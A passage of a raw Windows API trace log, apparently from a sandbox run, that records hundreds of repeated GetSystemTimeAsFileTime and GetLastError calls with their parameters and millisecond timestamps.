0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.135] GetLastError () returned 0x0 [0202.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.136] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.137] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.138] GetLastError () returned 0x0 [0202.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.139] GetLastError () returned 0x0 [0202.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.139] GetLastError () returned 0x0 [0202.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x189aa190, dwHighDateTime=0x1d4be3b)) [0202.139] GetLastError () returned 0x0 [0202.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x189aa190, dwHighDateTime=0x1d4be3b)) [0202.139] GetLastError () returned 0x0 [0202.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x189aa190, dwHighDateTime=0x1d4be3b)) [0202.139] GetLastError () returned 0x0 [0202.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x189aa190, dwHighDateTime=0x1d4be3b)) [0202.139] GetLastError () returned 0x0 [0202.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x189aa190, dwHighDateTime=0x1d4be3b)) [0202.139] GetLastError () returned 0x0 [0202.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x189aa190, dwHighDateTime=0x1d4be3b)) [0202.139] GetLastError () returned 0x0 [0202.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x189aa190, dwHighDateTime=0x1d4be3b)) [0202.139] GetLastError () returned 0x0 [0202.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x189aa190, dwHighDateTime=0x1d4be3b)) [0202.139] GetLastError () returned 0x0 [0202.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x189aa190, dwHighDateTime=0x1d4be3b)) [0202.139] GetLastError () returned 0x0 [0202.140] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x189aa190, dwHighDateTime=0x1d4be3b)) [0202.140] GetLastError () returned 0x0 [0202.140] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x189aa190, dwHighDateTime=0x1d4be3b)) [0202.140] GetLastError () returned 0x0 [0202.140] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x189aa190, dwHighDateTime=0x1d4be3b)) [0202.140] GetLastError () returned 0x0 [0202.872] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.872] GetLastError () returned 0x0 [0202.872] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.872] GetLastError () returned 0x0 [0202.872] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.872] GetLastError () returned 0x0 [0202.872] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.872] GetLastError () returned 0x0 [0202.872] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.872] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.873] GetLastError () returned 0x0 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.874] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.875] GetLastError () returned 0x0 [0202.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: 